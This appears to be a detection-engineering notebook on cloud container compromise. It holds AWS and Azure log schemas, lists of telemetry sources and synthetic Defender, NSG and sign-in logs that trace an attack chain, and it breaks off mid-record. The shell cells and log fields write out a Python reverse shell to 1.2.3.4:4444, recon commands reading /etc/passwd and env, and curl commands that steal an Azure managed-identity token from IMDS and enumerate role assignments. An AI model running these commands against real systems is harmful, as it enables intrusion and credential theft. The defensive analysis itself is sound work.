        "ROUTE53_HEALTHCHECKS": "Route 53 Health Checks IP ranges",
        "ROUTE53_HEALTHCHECKS_PUBLISHING": "Route 53 Health Checks Publishing IP ranges",
        "ROUTE53_RESOLVER": "Route 53 Resolver IP ranges",
        "S3": "S3 IP ranges",
        "WORKSPACES_GATEWAYS": "WorkSpaces Gateways IP ranges"
      }
    },
    "pkt-dst-aws-service": { "$ref": "#/properties/pkt-src-aws-service" },
    "flow-direction": {
      "type": "string",
      "enum": ["ingress", "egress"],
      "x-enumDescriptions": {
        "ingress": "Traffic entering the interface.",
        "egress": "Traffic leaving the interface."
      }
    },
    "traffic-path": {
      "type": ["integer", "string"],
      "enum": [1,2,3,4,5,6,7,8,"-"],
      "x-enumDescriptions": {
        "1": "Through another resource in the same VPC, including AWS-managed interface or Outpost local gateway",
        "2": "Through an internet gateway or a gateway VPC endpoint",
        "3": "Through a virtual private gateway",
        "4": "Through an intra-region VPC peering connection",
        "5": "Through an inter-region VPC peering connection",
        "6": "Through a Local Zone or Wavelength Zone",
        "7": "Through a gateway VPC endpoint (Nitro-based instances only)",
        "8": "Through an internet gateway (Nitro-based instances only)",
        "-": "No applicable path"
      }
    },
    "ecs-cluster-arn": { "type": "string" },
    "ecs-cluster-name": { "type": "string" },
    "ecs-container-instance-arn": { "type": "string" },
    "ecs-container-instance-id": { "type": "string" },
    "ecs-container-id": { "type": "string" },
    "ecs-second-container-id": { "type": "string" },
    "ecs-service-name": { "type": "string" },
    "ecs-task-definition-arn": { "type": "string" },
    "ecs-task-arn": { "type": "string" },
    "ecs-task-id": { "type": "string" },
    "reject-reason": {
      "type": "string",
      "enum": ["BPA","EC","-"],
      "x-enumDescriptions": {
        "BPA": "Rejected due to VPC Block Public Access (BPA).",
        "EC": "Rejected by VPC Endpoint due to encryption controls.",
        "-": "Other reject reasons or not applicable."
      }
    },
    "resource-id": { "type": "string", "description": "'-' if not a regional NAT gateway." },
    "encryption-status": {
      "type": ["integer","string"],
      "enum": [0,1,2,3,"-"],
      "x-enumDescriptions": {
        "0": "Not encrypted.",
        "1": "Nitro-encrypted by system hardware.",
        "2": "Application-encrypted (see TCP port 443 rules for endpoints).",
        "3": "Nitro-encrypted and application-encrypted.",
        "-": "VPC Encryption Controls not enabled or status unknown."
      }
    }
  },
  "required": ["version","account-id","interface-id","srcaddr","dstaddr","srcport","dstport","protocol","packets","bytes","start","end","action","log-status"]
}


In [None]:
import pandas as pd

# Define the record based on your schema
data = {
    "version": [5],
    "account-id": ["123456789012"],
    "interface-id": ["eni-0a1b2c3d4e5f6g7h8"],
    "srcaddr": ["10.0.2.15"],
    "dstaddr": ["203.0.113.88"],
    "srcport": [52410],
    "dstport": [443],
    "protocol": [6],
    "packets": [12],
    "bytes": [6400],
    "start": [1765584000],
    "end": [1765584060],
    "action": ["ACCEPT"],
    "log-status": ["OK"],
    "vpc-id": ["vpc-0abc123def456ghi"],
    "subnet-id": ["subnet-0123456789abcdef"],
    "instance-id": ["i-0abcdef1234567890"],
    "tcp-flags": [2],
    "type": ["IPv4"],
    "pkt-srcaddr": ["10.0.2.15"],
    "pkt-dstaddr": ["203.0.113.88"],
    "region": ["us-east-1"],
    "az-id": ["use1-az2"],
    "sublocation-type": ["-"],
    "sublocation-id": ["-"],
    "pkt-src-aws-service": ["-"],
    "pkt-dst-aws-service": ["-"],
    "flow-direction": ["egress"],
    "traffic-path": ["8"],
    "ecs-cluster-arn": ["arn:aws:ecs:us-east-1:123456789012:cluster/prod-cluster"],
    "ecs-cluster-name": ["prod-cluster"],
    "ecs-container-instance-arn": ["arn:aws:ecs:us-east-1:123456789012:container-instance/618a80"],
    "ecs-container-instance-id": ["-"],
    "ecs-container-id": ["c5d2e3f4g5h6i7j8k9l0"],
    "ecs-second-container-id": ["-"],
    "ecs-service-name": ["my-web-service"],
    "ecs-task-definition-arn": ["arn:aws:ecs:us-east-1:123456789012:task-definition/web-app:3"],
    "ecs-task-arn": ["arn:aws:ecs:us-east-1:123456789012:task/prod-cluster/9a8b7c6d5e4f"],
    "ecs-task-id": ["9a8b7c6d5e4f"],
    "reject-reason": ["-"],
    "resource-id": ["-"],
    "encryption-status": ["1"]
}

# Create DataFrame
df = pd.DataFrame(data)

# Save to Parquet format
df.to_parquet("vpc_flow_log.parquet", engine="pyarrow", index=False)

print("Parquet file 'vpc_flow_log.parquet' has been created.")


* VPC Flow Logs
API exposure happens over TCP (commonly 2375, 2376)

* AWS Network Firewall / NACL / Security Group Logs

* ELB / ALB / NLB Access Logs

* Amazon GuardDuty ‚Äì Runtime / Container Findings

(if EKS or ECS)

* CloudWatch Logs ‚Äì Container/Application Logs
Process execution (curl, wget, env, etc.)
Errors from failed privilege escalation attempts
Metadata endpoint calls (if app logs requests)

* GuardDuty ‚Äì Privilege Escalation / Defense Evasion Findings

Detects

* CloudWatch Logs (Host-based, if enabled)

OS-level audit logs

Kernel / permission denial messages


* VPC Flow Logs

Detects

Traffic from container/EC2 ‚Üí 169.254.169.254

Sudden metadata access from unexpected workloads


* GuardDuty ‚Äì Credential Access Findings

Examples:

UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration

CredentialAccess:InstanceMetadataService

* AWS CloudTrail (Management Events)

AssumeRole

GetCallerIdentity

Enumeration APIs (List*, Describe*)

Key Fields

userIdentity.type = AssumedRole

userIdentity.sessionContext.sessionIssuer

sourceIPAddress

userAgent

* CloudTrail ‚Äì Data Events
Object-level S3 access

DynamoDB item reads


* VPC Flow Logs

Detects

Large outbound data transfers

Transfers to unfamiliar IP ranges


* GuardDuty ‚Äì Exfiltration Findings

Examples:

Exfiltration:S3/ObjectRead

Exfiltration:DNS

* Azure Network Security Group (NSG) Flow Logs
Docker Remote API exposure (2375/2376) is a network-layer failure

NSG flow logs show who accessed the container host

* Azure Firewall Logs

* No native ‚ÄúDocker API audit log‚Äù

* Azure Monitor ‚Äì Container Logs

(for AKS, ACI, or VM-based containers)

Detects

Process execution inside containers

Use of tools like curl, wget, env

Failed privilege escalation attempts

Tables

ContainerLog

ContainerLogV2

* Microsoft Defender for Cloud ‚Äì Runtime Alerts

Detects

Container escape attempts

Access to sensitive host paths

Abnormal syscall patterns


* Azure VM Syslog / Windows Event Logs

(if AMA/agent enabled)

Detects

Permission denied events

Kernel / audit failures

* Azure NSG Flow Logs

Detects

Traffic to metadata IP 169.254.169.254

Sudden metadata access from containers/workloads

* Microsoft Defender for Cloud ‚Äì Identity & Credential Alerts

Detects

Suspicious managed identity usage

Token misuse patterns

Metadata abuse heuristics

* Azure Activity Log
Key Fields

Caller

Identity

Authorization

OperationName

CallerIpAddress

* Azure AD / Microsoft Entra ID Sign-in Logs

Detects

Token usage for Azure Resource Manager

Service principal / managed identity sign-ins

Tables

SigninLogs

AADNonInteractiveUserSignInLogs

ServicePrincipalSignInLogs


* Azure Storage (Blob / File / Queue / Table)

Telemetry

StorageBlobLogs

AzureDiagnostics

StorageRead, StorageWrite


* Azure Key Vault

One of the MOST IMPORTANT sources

Telemetry

AzureDiagnostics

* Defender for Cloud ‚Äì Exfiltration Alerts
Azure NSG Flow Logs

#AZURE

In [None]:
{
  "timeStamp": "2024-12-14T08:35:05.123Z",
  "resourceId": "/SUBSCRIPTIONS/xxxx/RESOURCEGROUPS/rg-demo/PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/appgw-demo",
  "operationName": "ApplicationGatewayFirewall",
  "category": "ApplicationGatewayFirewallLog",
  "properties": {
    "instanceId": "appgw_1",
    "clientIp": "203.0.113.45",
    "clientPort": "54321",
    "requestUri": "/api/v1/uploads?filename=shell.php",
    "ruleSetType": "OWASP",
    "ruleSetVersion": "3.0",
    "ruleId": "933100",
    "message": "PHP injection attack detected",
    "action": "Detected",
    "site": "Global",
    "details": {
      "message": "PHP injection attack: PHP script file upload detected",
      "data": "shell.php",
      "file": "rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf",
      "line": "45"
    },
    "hostname": "myapp.com",
    "transactionId": "b7c2e91a6f8d4a2db3f9a1c0e5d7a912",
    "policyId": "default",
    "policyScope": "Global",
    "policyScopeName": "Global"
  }
}


In [None]:
{
  "time": "2024-12-14T08:35:05.123Z",
  "category": "FrontdoorWebApplicationFirewallLog",
  "operationName": "Microsoft.Cdn/Profiles/Write",
  "properties": {
    "clientIP": "203.0.113.45",
    "clientPort": "54321",
    "socketIP": "203.0.113.45",
    "requestUri": "https://myapp.com/api/v1/uploads?filename=shell.php",
    "ruleName": "Microsoft_DefaultRuleSet-3.1-REQUEST-933-APPLICATION-ATTACK-PHP",
    "policy": "fd-waf-policy-prod",
    "action": "Log",
    "host": "myapp.com",
    "trackingReference": "08Q3gXgAAAAAe0s71BETQYwmqtpHO7uAU0pDRURHRTA1MDgANjMxNTAwZDAtOTRiNS00YzIwLTljY2YtNjFhNzMyOWQyYTgy",
    "policyMode": "Detection",
    "details": {
      "matches": [
        {
          "matchVariableName": "QueryParam:filename",
          "matchVariableValue": "shell.php"
        }
      ]
    }
  }
}


In [None]:
{
  "type": "object",
  "description": "Raw log schema for Azure Application Gateway Web Application Firewall events",
  "properties": {
    "timeStamp": {
      "type": "string",
      "format": "date-time",
      "description": "Timestamp when the WAF event was generated."
    },
    "resourceId": {
      "type": "string",
      "description": "Azure resource ID of the Application Gateway."
    },
    "operationName": {
      "type": "string",
      "const": "ApplicationGatewayFirewall",
      "description": "Azure operation name for Application Gateway WAF events."
    },
    "category": {
      "type": "string",
      "const": "ApplicationGatewayFirewallLog",
      "description": "Log category."
    },
    "properties": {
      "type": "object",
      "description": "WAF event properties.",
      "properties": {
        "instanceId": {
          "type": "string",
          "description": "Application Gateway instance for which firewall data is generated."
        },
        "clientIp": {
          "type": "string",
          "description": "Originating IP address of the client."
        },
        "clientPort": {
          "type": ["string", "null"],
          "description": "Originating port of the client request."
        },
        "requestUri": {
          "type": "string",
          "description": "URL of the received request."
        },
        "ruleSetType": {
          "type": "string",
          "enum": ["OWASP"],
          "description": "Rule set type used by the WAF."
        },
        "ruleSetVersion": {
          "type": "string",
          "enum": ["2.2.9", "3.0"],
          "description": "OWASP CRS version applied to the request."
        },
        "ruleId": {
          "type": "string",
          "description": "OWASP CRS rule ID that triggered the event."
        },
        "message": {
          "type": "string",
          "description": "User-friendly description of the triggering event."
        },
        "action": {
          "type": "string",
          "enum": ["Allowed", "Blocked", "Matched", "Detected"],
          "description": "Action taken by the WAF for the request."
        },
        "site": {
          "type": "string",
          "enum": ["Global"],
          "description": "Site scope for which the log was generated."
        },
        "details": {
          "type": "object",
          "description": "Detailed information about the rule match.",
          "properties": {
            "message": {
              "type": "string",
              "description": "Detailed description of the rule that triggered."
            },
            "data": {
              "type": ["string", "null"],
              "description": "Specific request data that matched the rule."
            },
            "file": {
              "type": ["string", "null"],
              "description": "OWASP CRS configuration file that contained the rule."
            },
            "line": {
              "type": ["string", "null"],
              "description": "Line number in the configuration file that triggered the rule."
            }
          },
          "required": ["message"]
        },
        "hostname": {
          "type": "string",
          "description": "Hostname or IP address of the Application Gateway."
        },
        "transactionId": {
          "type": "string",
          "description": "Unique identifier used to correlate multiple rule matches within the same request."
        },
        "policyId": {
          "type": ["string", "null"],
          "description": "Identifier of the WAF policy applied to the request."
        },
        "policyScope": {
          "type": ["string", "null"],
          "enum": ["Global"],
          "description": "Scope at which the policy is applied."
        },
        "policyScopeName": {
          "type": ["string", "null"],
          "description": "Human-readable name of the policy scope."
        }
      },
      "required": [
        "instanceId",
        "clientIp",
        "requestUri",
        "ruleSetType",
        "ruleSetVersion",
        "ruleId",
        "message",
        "action",
        "site",
        "hostname",
        "transactionId"
      ]
    }
  },
  "required": [
    "timeStamp",
    "resourceId",
    "operationName",
    "category",
    "properties"
  ]
}


In [None]:
{
  "type": "object",
  "description": "Raw log schema for Azure Front Door Web Application Firewall events",
  "properties": {
    "time": {
      "type": "string",
      "format": "date-time",
      "description": "Timestamp when the WAF event was generated."
    },
    "category": {
      "type": "string",
      "const": "FrontdoorWebApplicationFirewallLog",
      "description": "Log category for Azure Front Door WAF."
    },
    "operationName": {
      "type": "string",
      "description": "Azure operation associated with the request."
    },
    "properties": {
      "type": "object",
      "description": "WAF event properties.",
      "properties": {
        "action": {
          "type": "string",
          "enum": [
            "Allow",
            "Block",
            "Log",
            "AnomalyScoring",
            "JSChallengeIssued",
            "JSChallengePass",
            "JSChallengeValid",
            "JSChallengeBlock"
          ],
          "description": "Action taken by Azure Front Door WAF on the request."
        },
        "clientIP": {
          "type": "string",
          "description": "Client IP address derived from X-Forwarded-For or request source."
        },
        "clientPort": {
          "type": ["string", "null"],
          "description": "Client source port."
        },
        "socketIP": {
          "type": ["string", "null"],
          "description": "Source IP address observed at the TCP connection level."
        },
        "requestUri": {
          "type": "string",
          "description": "Full URI of the incoming request."
        },
        "host": {
          "type": "string",
          "description": "Host header of the request."
        },
        "ruleName": {
          "type": ["string", "null"],
          "description": "Name of the managed WAF rule that matched the request."
        },
        "policy": {
          "type": "string",
          "description": "Name of the Front Door WAF policy that evaluated the request."
        },
        "policyMode": {
          "type": "string",
          "enum": ["Prevention", "Detection"],
          "description": "Operational mode of the WAF policy."
        },
        "trackingReference": {
          "type": "string",
          "description": "Unique identifier for correlating Front Door requests (X-Azure-Ref)."
        },
        "details": {
          "type": ["object", "null"],
          "description": "Details of rule evaluation and matched request components.",
          "properties": {
            "matches": {
              "type": "array",
              "description": "List of matched request elements.",
              "items": {
                "type": "object",
                "properties": {
                  "matchVariableName": {
                    "type": "string",
                    "maxLength": 100,
                    "description": "Name of the HTTP request variable that matched."
                  },
                  "matchVariableValue": {
                    "type": "string",
                    "maxLength": 100,
                    "description": "Value that triggered the rule match."
                  }
                },
                "required": ["matchVariableName", "matchVariableValue"]
              }
            }
          }
        },
        "anomalyScore": {
          "type": ["integer", "null"],
          "description": "Cumulative anomaly score assigned to the request when anomaly scoring is enabled."
        },
        "jsChallenge": {
          "type": ["object", "null"],
          "description": "JS Challenge lifecycle details when applicable.",
          "properties": {
            "status": {
              "type": "string",
              "enum": [
                "Issued",
                "Passed",
                "Valid",
                "Blocked"
              ],
              "description": "Outcome of the JS challenge evaluation."
            },
            "reason": {
              "type": ["string", "null"],
              "description": "Reason for JS challenge failure or block."
            }
          }
        }
      },
      "required": [
        "action",
        "clientIP",
        "requestUri",
        "host",
        "policy",
        "policyMode",
        "trackingReference"
      ]
    }
  },
  "required": [
    "time",
    "category",
    "operationName",
    "properties"
  ]
}


In [None]:
# GET /uploads/shell.php?cmd=python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

In [None]:
{
  "Timestamp": "2025-12-14T10:41:52.113Z",
  "DeviceId": "AZVM-LINUX-01",
  "DeviceName": "linux-vm-01.eastus.cloudapp.azure.com",
  "DeviceOSPlatform": "Linux",
  "ActionType": "ProcessCreated",

  "FileName": "python3",
  "FolderPath": "/usr/bin/python3",
  "ProcessId": 4123,
  "ProcessCommandLine": "python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"1.2.3.4\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'",
  "ProcessCreationTime": "2025-12-14T10:41:52.113Z",

  "AccountName": "www-data",
  "AccountDomain": "container",
  "AccountSid": "uid-33",

  "InitiatingProcessFileName": "php-fpm",
  "InitiatingProcessFolderPath": "/usr/sbin/php-fpm",
  "InitiatingProcessId": 3987,
  "InitiatingProcessCommandLine": "php-fpm: pool www",
  "InitiatingProcessCreationTime": "2025-12-14T10:39:11.004Z",

  "InitiatingProcessAccountName": "root",
  "InitiatingProcessAccountDomain": "container",
  "InitiatingProcessAccountSid": "uid-0",

  "ProcessUniqueId": "4123-2025-12-14T10:41:52.113Z",
  "InitiatingProcessUniqueId": "3987-2025-12-14T10:39:11.004Z",

  "AdditionalFields": "{\"Containerized\":\"true\",\"Cgroup\":\"/docker/8c2f9b7d4e\",\"ExecutionContext\":\"WebShell\"}"
}


In [None]:
{
  "Timestamp": "2025-12-14T10:41:53.287Z",
  "DeviceId": "AZVM-LINUX-01",
  "DeviceName": "linux-vm-01.eastus.cloudapp.azure.com",
  "DeviceOSPlatform": "Linux",
  "ActionType": "ProcessCreated",

  "FileName": "sh",
  "FolderPath": "/bin/sh",
  "ProcessId": 4151,
  "ProcessCommandLine": "/bin/sh",
  "ProcessCreationTime": "2025-12-14T10:41:53.287Z",

  "AccountName": "www-data",
  "AccountDomain": "container",
  "AccountSid": "uid-33",

  "InitiatingProcessFileName": "python3",
  "InitiatingProcessFolderPath": "/usr/bin/python3",
  "InitiatingProcessId": 4123,
  "InitiatingProcessCommandLine": "python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"1.2.3.4\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'",
  "InitiatingProcessCreationTime": "2025-12-14T10:41:52.113Z",

  "InitiatingProcessParentId": 3987,
  "InitiatingProcessParentFileName": "php-fpm",
  "InitiatingProcessParentCreationTime": "2025-12-14T10:39:11.004Z",

  "InitiatingProcessAccountName": "www-data",
  "InitiatingProcessAccountDomain": "container",
  "InitiatingProcessAccountSid": "uid-33",

  "ProcessUniqueId": "4151-2025-12-14T10:41:53.287Z",
  "InitiatingProcessUniqueId": "4123-2025-12-14T10:41:52.113Z",

  "AdditionalFields": "{\"Containerized\":\"true\",\"InteractiveShell\":\"true\",\"SpawnMethod\":\"pty.spawn\"}"
}


In [None]:
{
  "Timestamp": "2025-12-14T10:43:15.902Z",
  "DeviceId": "AZVM-LINUX-01",
  "DeviceName": "linux-vm-01.eastus.cloudapp.azure.com",
  "ActionType": "ConnectionSuccess",

  "RemoteIP": "1.2.3.4",
  "RemotePort": 4444,
  "RemoteUrl": "",
  "LocalIP": "172.17.0.5",
  "LocalPort": 48732,
  "Protocol": "TCP",

  "InitiatingProcessFileName": "python3",
  "InitiatingProcessSHA1": "d2a6f92c7a1f4e0f9b0a0b6c91c9a4c9e7b9f312",
  "InitiatingProcessSHA256": "b9f41e88f6a7e36b2c7a2e38d3b19d4f74c2e1b8a6fd91c3b0f3c1c0e7f9a8d2",
  "InitiatingProcessMD5": "a4d1c3f6e8b90a2c7e4f91b0d3e2a6f9",
  "InitiatingProcessFileSize": 684312,

  "InitiatingProcessId": 4123,
  "InitiatingProcessCommandLine": "python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"1.2.3.4\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'",
  "InitiatingProcessCreationTime": "2025-12-14T10:41:52.113Z",
  "InitiatingProcessFolderPath": "/usr/bin/",

  "InitiatingProcessParentFileName": "php-fpm",
  "InitiatingProcessParentId": 3987,
  "InitiatingProcessParentCreationTime": "2025-12-14T10:39:11.004Z",

  "InitiatingProcessAccountDomain": "container",
  "InitiatingProcessAccountName": "www-data",
  "InitiatingProcessAccountSid": "uid-33",

  "ReportId": 7744112233,

  "AdditionalFields": "{\"Containerized\":\"true\",\"ConnectionDirection\":\"Outbound\",\"C2Pattern\":\"ReverseShell\"}",

  "InitiatingProcessSessionId": 1,
  "IsInitiatingProcessRemoteSession": false,
  "IsProcessRemoteSession": false,

  "ProcessUniqueId": "4123-2025-12-14T10:41:52.113Z",
  "InitiatingProcessUniqueId": "3987-2025-12-14T10:39:11.004Z"
}


In [None]:
[
    {
      "time": "2025-12-14T10:43:12.0870000Z",
      "systemId": "nsgflow-azvm-linux-01",
      "category": "NetworkSecurityGroupFlowEvent",
      "resourceId": "/SUBSCRIPTIONS/11111111-2222-3333-4444-555555555555/RESOURCEGROUPS/SECURITY-RG/PROVIDERS/MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/AZVM-LINUX-NSG",
      "operationName": "NetworkSecurityGroupFlowEvents",
      "properties": {
        "Version": 2,
        "flows": [
          {
            "rule": "AllowInternetOutbound",
            "flows": [
              {
                "mac": "00155D3A9C01",
                "flowTuples": [
                  "1734172992,10.0.1.25,1.2.3.4,45678,4444,T,O,A,B,0,0,0,0"
                ]
              }
            ]
          }
        ]
      }
    },
    {
      "time": "2025-12-14T10:43:50.2140000Z",
      "systemId": "nsgflow-azvm-linux-01",
      "category": "NetworkSecurityGroupFlowEvent",
      "resourceId": "/SUBSCRIPTIONS/11111111-2222-3333-4444-555555555555/RESOURCEGROUPS/SECURITY-RG/PROVIDERS/MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/AZVM-LINUX-NSG",
      "operationName": "NetworkSecurityGroupFlowEvents",
      "properties": {
        "Version": 2,
        "flows": [
          {
            "rule": "AllowInternetOutbound",
            "flows": [
              {
                "mac": "00155D3A9C01",
                "flowTuples": [
                  "1734173030,10.0.1.25,1.2.3.4,45678,4444,T,O,A,C,24,19200,18,14800"
                ]
              }
            ]
          }
        ]
      }
    },
    {
      "time": "2025-12-14T10:44:40.3320000Z",
      "systemId": "nsgflow-azvm-linux-01",
      "category": "NetworkSecurityGroupFlowEvent",
      "resourceId": "/SUBSCRIPTIONS/11111111-2222-3333-4444-555555555555/RESOURCEGROUPS/SECURITY-RG/PROVIDERS/MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/AZVM-LINUX-NSG",
      "operationName": "NetworkSecurityGroupFlowEvents",
      "properties": {
        "Version": 2,
        "flows": [
          {
            "rule": "AllowInternetOutbound",
            "flows": [
              {
                "mac": "00155D3A9C01",
                "flowTuples": [
                  "1734173100,10.0.1.25,1.2.3.4,45678,4444,T,O,A,C,8,4600,6,3980"
                ]
              }
            ]
          }
        ]
      }
    }
  ]


In [None]:
{
  "Timestamp": "2025-12-14T10:42:32.904Z",
  "DeviceId": "AZVM-LINUX-01",
  "DeviceName": "linux-vm-01.eastus.cloudapp.azure.com",
  "DeviceOSPlatform": "Linux",
  "ActionType": "ProcessCreated",

  "FileName": "sh",
  "FolderPath": "/bin/sh",
  "ProcessId": 4151,
  "ProcessCommandLine": "sh -c \"whoami; cat /etc/passwd; env;ls -l /var/run/;mount;cat /proc/self/mountinfo\"",
  "ProcessCreationTime": "2025-12-14T10:41:53.287Z",

  "AccountName": "www-data",
  "AccountDomain": "container",
  "AccountSid": "uid-33",

  "InitiatingProcessFileName": "python3",
  "InitiatingProcessFolderPath": "/usr/bin/python3",
  "InitiatingProcessId": 4123,
  "InitiatingProcessCommandLine": "python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"1.2.3.4\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'",
  "InitiatingProcessCreationTime": "2025-12-14T10:41:52.113Z",

  "InitiatingProcessParentId": 3987,
  "InitiatingProcessParentFileName": "php-fpm",
  "InitiatingProcessParentCreationTime": "2025-12-14T10:39:11.004Z",

  "InitiatingProcessAccountName": "www-data",
  "InitiatingProcessAccountDomain": "container",
  "InitiatingProcessAccountSid": "uid-33",

  "ProcessUniqueId": "4151-2025-12-14T10:41:53.287Z",
  "InitiatingProcessUniqueId": "4123-2025-12-14T10:41:52.113Z",

  "AdditionalFields": "{\"Containerized\":\"true\",\"InteractiveShell\":\"true\",\"SuspiciousCommandExecution\":\"true\",\"ExecutedCommandCount\":3,\"ExecutedCommands\":[\"whoami\",\"cat /etc/passwd\",\"env\"],\"eventFirstSeen\":\"2025-12-14T10:42:32.904Z\",\"eventLastSeen\":\"2025-12-14T10:42:41.118Z\"}"
}


In [None]:
ls -l /var/run/
mount
cat /proc/self/mountinfo
Privileged mounts (/, /sys, /proc, /var/lib/docker)

In [None]:
curl -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

Potential Defender alert:
Unusual IMDS access from container

In [None]:
{
  "Timestamp": "2025-12-14T10:42:44.731Z",
  "DeviceId": "AZVM-LINUX-01",
  "DeviceName": "linux-vm-01.eastus.cloudapp.azure.com",
  "ActionType": "ConnectionSuccess",

  "RemoteIP": "169.254.169.254",
  "RemotePort": 80,
  "RemoteUrl": "http://169.254.169.254/metadata/identity/oauth2/token",
  "LocalIP": "172.17.0.5",
  "LocalPort": 49382,
  "Protocol": "TCP",

  "InitiatingProcessFileName": "curl",
  "InitiatingProcessId": 4328,
  "InitiatingProcessCommandLine": "curl -H Metadata:true http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/",
  "InitiatingProcessCreationTime": "2025-12-14T10:42:44.612Z",
  "InitiatingProcessFolderPath": "/usr/bin/",

  "InitiatingProcessParentFileName": "sh",
  "InitiatingProcessParentId": 4151,
  "InitiatingProcessParentCreationTime": "2025-12-14T10:41:53.287Z",

  "InitiatingProcessAccountName": "www-data",
  "InitiatingProcessAccountDomain": "container",
  "InitiatingProcessAccountSid": "uid-33",

  "ReportId": 8812345567,

  "AdditionalFields": "{\"Containerized\":\"true\",\"MetadataService\":\"AzureIMDS\",\"TokenType\":\"ManagedIdentity\"}",

  "ProcessUniqueId": "4328-2025-12-14T10:42:44.612Z",
  "InitiatingProcessUniqueId": "4151-2025-12-14T10:41:53.287Z"
}


In [None]:
curl -H "Authorization: Bearer <ACCESS_TOKEN>" \
  "https://management.azure.com/subscriptions/<SUB_ID>/providers/Microsoft.Authorization/roleAssignments?api-version=2022-04-01"
Attacker learns:
Role names (e.g., Reader, Storage Blob Data Reader)
Scope (subscription / resource group / resource)

Telemetry later
AzureActivity
Microsoft.Authorization/roleAssignments/read

AADSignInLogs
Managed Identity token usage

In [None]:
{
  "Timestamp": "2025-12-14T10:42:47.318Z",
  "DeviceId": "AZVM-LINUX-01",
  "DeviceName": "linux-vm-01.eastus.cloudapp.azure.com",
  "ActionType": "ConnectionSuccess",

  "RemoteIP": "20.50.2.12",
  "RemotePort": 443,
  "RemoteUrl": "https://management.azure.com/subscriptions/3fa85f64-5717-4562-b3fc-2c963f66afa6/providers/Microsoft.Authorization/roleAssignments?api-version=2022-04-01",

  "LocalIP": "172.17.0.5",
  "LocalPort": 49412,
  "Protocol": "TCP",

  "InitiatingProcessFileName": "curl",
  "InitiatingProcessId": 4386,
  "InitiatingProcessCommandLine": "curl -H \"Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IjE2QkE5QzY4In0.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tLyIsImlzcyI6Imh0dHBzOi8vbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbS8xMjM0NTY3OC05YWJjLWRlZjAtMTIzNC01Njc4OWFiY2RlZi92Mi4wIiwiaWF0IjoxNzM0MTcyOTY3LCJuYmYiOjE3MzQxNzI5NjcsImV4cCI6MTczNDE3NjU2NywiYWlkIjoiYXp1cmUtbWFuYWdlZC1pZGVudGl0eSIsInRpZCI6IjEyMzQ1Njc4LTlhYmMtZGVmMC0xMjM0LTU2Nzg5YWJjZGVmIn0.signature\" https://management.azure.com/subscriptions/3fa85f64-5717-4562-b3fc-2c963f66afa6/providers/Microsoft.Authorization/roleAssignments?api-version=2022-04-01",
  "InitiatingProcessCreationTime": "2025-12-14T10:42:44.612Z",
  "InitiatingProcessFolderPath": "/usr/bin/",

  "InitiatingProcessParentFileName": "sh",
  "InitiatingProcessParentId": 4151,
  "InitiatingProcessParentCreationTime": "2025-12-14T10:41:53.287Z",

  "InitiatingProcessAccountName": "www-data",
  "InitiatingProcessAccountDomain": "container",
  "InitiatingProcessAccountSid": "uid-33",

  "ReportId": 8823419901,

  "AdditionalFields": "{\"Containerized\":\"true\",\"AzureControlPlane\":\"ARM\",\"Operation\":\"RoleAssignmentsRead\",\"IdentityType\":\"ManagedIdentity\",\"RBACDiscovery\":\"true\"}",

  "ProcessUniqueId": "4386-2025-12-14T10:42:47.318Z",
  "InitiatingProcessUniqueId": "4151-2025-12-14T10:41:53.287Z"
}


In [None]:
{
  "TimeGenerated": "2025-12-14T10:42:48.914Z",
  "ResourceId": "/subscriptions/11111111-2222-3333-4444-555555555555/resourcegroups/security-logs/providers/microsoft.operationalinsights/workspaces/azvm-linux-sentinel",
  "Category": "SignInLogs",
  "OperationName": "Sign-in activity",
  "Type": "SigninLogs",

  "AADTenantId": "12345678-9abc-def0-1234-56789abcdef0",
  "Id": "signin-azmi-7f3a9c12-4e2b-4d3e-9c11-9c77e8b0f912",
  "CreatedDateTime": "2025-12-14T10:42:48.914Z",

  "UserDisplayName": null,
  "UserPrincipalName": null,
  "UserId": null,
  "UserType": "ServicePrincipal",

  "AppId": "a1b2c3d4-e5f6-7890-abcd-111122223333",
  "AppDisplayName": "Azure Resource Manager",
  "ServicePrincipalId": "a1b2c3d4-e5f6-7890-abcd-111122223333",
  "ServicePrincipalName": "azvm-linux-01-managed-identity",

  "ResourceDisplayName": "Azure Resource Manager",
  "ResourceIdentity": "https://management.azure.com/",
  "ResourceServicePrincipalId": "797f4846-ba00-4fd7-ba43-dac1f8f63013",

  "IPAddress": "10.0.1.25",
  "Location": "Azure Datacenter",
  "LocationDetails": {
    "city": null,
    "state": null,
    "countryOrRegion": "Azure"
  },

  "DeviceDetail": {
    "deviceId": "AZVM-LINUX-01",
    "displayName": "linux-vm-01",
    "operatingSystem": "Linux",
    "browser": "curl",
    "isCompliant": false,
    "isManaged": false,
    "trustType": "AzureAD"
  },

